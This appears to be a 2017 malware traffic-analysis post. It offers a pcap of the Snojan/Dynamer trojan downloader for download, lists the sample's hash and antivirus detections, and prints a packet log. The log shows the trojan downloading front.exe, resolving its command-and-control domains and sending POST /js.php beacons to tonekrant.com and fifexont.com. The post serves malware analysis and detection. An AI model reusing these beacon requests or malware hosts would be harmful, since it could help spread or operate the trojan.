Snojan Dynamer Trojan Downloader Malware fifexont.com tonekrant.com FULL PCAP File Download Traffic Analysis

Download Attachments

  • 1 pcap front
    Date added: February 20, 2017 5:33 am Added by: admin File size: 38 KB Downloads: 94
SHA256: a66c3e211004c7d403f633a0ced7327f5b2b102f47be4226d24edcb7ebd21562
File name: front.exe
Detection ratio: 49 / 58
Analysis date: 2017-02-20 05:26:08 UTC ( 0 minutes ago )
Antivirus Result Update
ALYac Trojan.GenericKD.4294253 20170220
AVG Agent5.AXHG 20170220
AVware Trojan.Win32.Generic!BT 20170220
Ad-Aware Trojan.GenericKD.4294253 20170220
AegisLab Uds.Dangerousobject.Multi!c 20170220
AhnLab-V3 Trojan/Win32.Snojan.C1770480 20170219
Arcabit Trojan.Generic.D41866D 20170220
Avast Win32:Malware-gen 20170220
Avira (no cloud) TR/Crypt.ZPACK.wcpog 20170219
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9999 20170217
BitDefender Trojan.GenericKD.4294253 20170220
Bkav HW32.Packed.3570 20170218
CAT-QuickHeal Trojan.Dynamer 20170218
ClamAV Win.Trojan.Generic-5747581-0 20170220
Comodo UnclassifiedMalware 20170220
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20170130

2017-02-18 07:29:58.854612 IP 192.168.1.102.55863 > 46.30.213.95.80: Flags [P.], seq 0:285, ack 1, win 64240, length 285: HTTP: GET /front.exe HTTP/1.1
E..E}.@….f…f…_.7.P.^$UN..rP…….GET /front.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: galflview.com
Connection: Keep-Alive

2017-02-18 07:30:39.853148 IP 192.168.1.102.58750 > 75.75.75.75.53: 64438+ A? mutinenag.com. (31)
E..;(……)…fKKKK.~.5.’…………..        mutinenag.com…..
2017-02-18 07:30:39.895762 IP 192.168.1.102.49577 > 75.75.75.75.53: 38977+ A? mutinenag.com.hsd1.md.comcast.net. (51)
E..O(……….fKKKK…5.;[..A……….        mutinenag.com.hsd1.md.comcast.net…..
2017-02-18 07:30:39.926948 IP 192.168.1.102.49577 > 75.75.76.76.53: 38977+ A? mutinenag.com.hsd1.md.comcast.net. (51)
E..OFa………fKKLL…5.;Y..A……….        mutinenag.com.hsd1.md.comcast.net…..
2017-02-18 07:30:44.725455 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
E..Y    Y………f.8.+.J…E……..RH…’.`…..:……………………………..}8….
2017-02-18 07:30:58.514427 IP 192.168.1.102.50385 > 75.75.75.75.53: 22454+ A? v10.vortex-win.data.microsoft.com. (51)
E..O(……….fKKKK…5.;..W…………v10
vortex-win.data microsoft.com…..
2017-02-18 07:31:01.723097 IP 192.168.1.102.50386 > 75.75.75.75.53: 16459+ A? mumeraxo.com. (30)
E..:(……&…fKKKK…5.&.o@K………..mumeraxo.com…..
2017-02-18 07:31:01.794496 IP 192.168.1.102.58993 > 75.75.75.75.53: 13753+ A? mumeraxo.com.hsd1.md.comcast.net. (50)
E..N(……….fKKKK.q.5.:Im5…………mumeraxo.com.hsd1.md.comcast.net…..
2017-02-18 07:31:01.825945 IP 192.168.1.102.58993 > 75.75.76.76.53: 13753+ A? mumeraxo.com.hsd1.md.comcast.net. (50)
E..NFe………fKKLL.q.5.:Hl5…………mumeraxo.com.hsd1.md.comcast.net…..
2017-02-18 07:31:12.547120 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
E..Y    Z………f.8.+.J…E……..RH…’.`…..:……………………………..}8….
2017-02-18 07:31:23.630061 IP 192.168.1.102.58994 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(……”…fKKKK.r.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:24.641948 IP 192.168.1.102.58995 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(……!…fKKKK.s.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:25.627370 IP 192.168.1.102.58996 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(…… …fKKKK.t.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:25.629833 IP 192.168.1.102.58994 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
E..;Fi………fKKLL.r.5.’ .i………..        tonekrant.com…..
2017-02-18 07:31:26.641969 IP 192.168.1.102.58995 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
E..;Fj………fKKLL.s.5.’ .i………..        tonekrant.com…..
2017-02-18 07:31:27.627190 IP 192.168.1.102.58996 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
E..;Fk………fKKLL.t.5.’ .i………..        tonekrant.com…..
2017-02-18 07:31:27.627605 IP 192.168.1.102.58997 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(……….fKKKK.u.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:27.630024 IP 192.168.1.102.58994 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(……….fKKKK.r.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:28.032961 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [S], seq 3536318263, win 8192, options

2017-02-18 07:31:28.202872 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [P.], seq 0:428, ack 1, win 256, length 428: HTTP: POST /js.php HTTP/1.1
E…m[@……..f].y/.;.P…8..N.P…….POST /js.php HTTP/1.1
Host: tonekrant.com
Accept: text/html, */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Connection: close

PKEY……………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2017-02-18 07:31:28.353750 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [.], ack 2, win 256, length 0
E..(m\@……..f].y/.;.P……N.P…\………
2017-02-18 07:31:28.354903 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [F.], seq 428, ack 2, win 256, length 0
E..(m]@……..f].y/.;.P……N.P…\………
2017-02-18 07:31:28.642457 IP 192.168.1.102.58995 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(……….fKKKK.s.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:29.627324 IP 192.168.1.102.58996 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
E..;(……….fKKKK.t.5.’!.i………..        tonekrant.com…..
2017-02-18 07:31:29.630282 IP 192.168.1.102.58994 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
E..;Fp………fKKLL.r.5.’ .i………..        tonekrant.com…..
2017-02-18 07:31:30.642485 IP 192.168.1.102.58995 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
E..;Fq………fKKLL.s.5.’ .i………..        tonekrant.com…..
2017-02-18 07:31:37.200322 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
E..Y    [………f.8.+.J…E……..RH…’.`…..:……………………………..}8….
2017-02-18 07:31:43.367646 IP 192.168.1.102.58998 > 75.75.75.75.53: 46732+ A? fifexont.com. (30)
E..:(……….fKKKK.v.5.&}…………..fifexont.com…..
2017-02-18 07:31:44.361927 IP 192.168.1.102.58999 > 75.75.75.75.53: 46732+ A? fifexont.com. (30)
E..:(……….fKKKK.w.5.&}…………..fifexont.com…..
2017-02-18 07:31:45.361997 IP 192.168.1.102.59000 > 75.75.75.75.53: 46732+ A? fifexont.com. (30)
E..:(……….fKKKK.x.5.&}…………..fifexont.com…..
2017-02-18 07:31:45.363970 IP 192.168.1.102.58998 > 75.75.76.76.53: 46732+ A? fifexont.com. (30)
E..:Fu………fKKLL.v.5.&|…………..fifexont.com…..
2017-02-18 07:31:46.361710 IP 192.168.1.102.58999 > 75.75.76.76.53: 46732+ A? fifexont.com. (30)
E..:Fv………fKKLL.w.5.&|…………..fifexont.com…..

2017-02-18 07:31:46.827372 IP 192.168.1.102.56024 > 93.179.121.170.80: Flags [P.], seq 0:427, ack 1, win 256, length 427: HTTP: POST /js.php HTTP/1.1
E…D.@….1…f].y….P`?Y…..P….’..POST /js.php HTTP/1.1
Host: fifexont.com
Accept: text/html, */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Connection: close

PKEY……………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2017-02-18 07:31:46.976014 IP 192.168.1.102.56024 > 93.179.121.170.80: Flags [.], ack 2, win 256, length 0
E..(D.@……..f].y….P`?[…..P………….
2017-02-18 07:31:46.976419 IP 192.168.1.102.56024 > 93.179.121.170.80: Flags [F.], seq 427, ack 2, win 256, length 0
E..(D.@……..f].y….P`?[…..P………….
2017-02-18 07:31:47.361693 IP 192.168.1.102.59000 > 75.75.76.76.53: 46732+ A? fifexont.com. (30)
E..:Fw………fKKLL.x.5.&|…………..fifexont.com…..
2017-02-18 07:31:47.364159 IP 192.168.1.102.58998 > 75.75.75.75.53: 46732+ A? fifexont.com. (30)
E..:(……….fKKKK.v.5.&}…………..fifexont.com…..

2017-02-18 07:35:43.355047 IP 192.168.1.102.49579 > 75.75.75.75.53: 44680+ A? tele.trafficmanager.net. (41)
E..E)……….fKKKK…5.13…………..tele.trafficmanager.net…..
2017-02-18 07:35:43.373699 IP 192.168.1.102.56039 > 191.239.50.77.80: Flags [S], seq 3222178950, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..45A@….8…f..2M…P………. .r……………
2017-02-18 07:35:43.402299 IP 192.168.1.102.56038 > 65.55.252.190.443: Flags [.], ack 4237, win 253, length 0
E..(.W@….t…fA7…….._.c./.P………….
2017-02-18 07:35:43.457448 IP 192.168.1.102.56039 > 191.239.50.77.80: Flags [.], ack 3335379774, win 258, length 0
E..(5B@….C…f..2M…P…….>P…0………
2017-02-18 07:35:43.457557 IP 192.168.1.102.56039 > 191.239.50.77.80: Flags [P.], seq 0:189, ack 1, win 258, length 189: HTTP: GET /%7B5F1B98CE-D333-41DA-B5CE-72EFDD71B6DF%7D HTTP/1.1
E…5C@……..f..2M…P…….>P…….GET /%7B5F1B98CE-D333-41DA-B5CE-72EFDD71B6DF%7D HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: client connection
Host: tele.trafficmanager.net

Leave a Reply